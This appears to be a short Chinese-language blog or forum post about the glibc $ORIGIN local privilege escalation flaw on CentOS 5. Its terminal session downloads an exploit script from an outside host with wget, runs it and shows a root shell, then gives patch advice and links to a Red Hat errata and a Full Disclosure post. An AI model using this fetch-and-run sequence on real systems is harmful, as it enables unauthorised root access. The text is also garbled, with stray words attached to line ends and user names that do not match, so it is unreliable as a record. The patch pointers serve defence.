glibc $ORIGIN 本地權限提高漏洞

#useradd hx10ide

#su - hx10ui

[akin@Centos5 ~]$ wget http://autosetup1.googlecode.com/files/glibc-exp.sh
--2010-08-03 01:09:19--  http://autosetup1.googlecode.com/files/glibc-exp.sh
Resolving autosetup1.googlecode.com... 72.14.203.82
Connecting to autosetup1.googlecode.com|72.14.203.82|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 311 [text/plain]
Saving to: `glibc-exp.sh'google

100%[====================================================================================================>] 311         1.41K/s   in 0.2s   code

2010-08-03 01:09:21 (1.41 KB/s) - `glibc-exp.sh' saved [311/311]get

[akin@Centos5 ~]$ chmod 755 glibc-exp.sh
[akin@Centos5 ~]$ ./glibc-exp.sh
[root@Centos5 ~]# id
uid=0(root) gid=500(akin) groups=500(akin)it

把補丁去吧，yum install glibcclass

RH對應解決方案: https://rhn.redhat.com/rhn/errata/details/Details.do?eid=10325cli

詳情可參考: http://seclists.org/fulldisclosure/2010/Oct/257file